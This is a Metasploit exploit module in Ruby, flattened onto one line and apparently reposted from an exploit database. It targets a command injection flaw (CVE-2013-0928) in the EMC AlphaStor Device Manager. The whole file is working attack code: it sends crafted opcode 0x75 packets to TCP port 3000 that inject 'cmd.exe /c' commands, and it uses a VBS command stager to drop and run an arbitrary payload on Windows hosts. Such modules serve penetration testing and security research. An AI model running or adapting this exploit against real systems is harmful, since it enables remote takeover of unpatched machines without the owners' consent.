require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection', 'Description' => %q{ This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75 command, the process does not properly filter user supplied input allowing for arbitrary command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116 with Windows 2003 SP2 and Windows 2008 R2. }, 'Author' => [ 'Anyway ', # Vulnerability Discovery 'Preston Thornburn ', # msf module 'Mohsan Farid ', # msf module 'Brent Morris ', # msf module 'juan vazquez' # convert aux module into exploit ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-0928'], ['ZDI', '13-033'] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Targets' => [ [ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ] ], 'CmdStagerFlavor' => 'vbs', 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 18 2013')) register_options( [ Opt::RPORT(3000) ], self.class ) end def check packet = "\x75~ mminfo & #{rand_text_alpha(512)}" res = send_packet(packet) if res && res =~ /Could not fork command/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Unknown end def exploit execute_cmdstager({ :linemax => 487 }) end def execute_command(cmd, opts) padding = rand_text_alpha_upper(489 - cmd.length) packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}" connect sock.put(packet) begin sock.get_once rescue EOFError fail_with(Failure::Unknown, "Failed to deploy CMD Stager") end disconnect end def execute_cmdstager_begin(opts) if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/ cmd_list.each do |cmd| cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")") end end end def send_packet(packet) connect sock.put(packet) begin meta_data = sock.get_once(8) rescue EOFError meta_data = nil end unless meta_data disconnect return nil end code, length = meta_data.unpack("N*") unless code == 1 disconnect return nil end begin data = sock.get_once(length) rescue EOFError data = nil ensure disconnect end data end end # Iranian Exploit DataBase = http://IeDb.Ir [2014-09-27]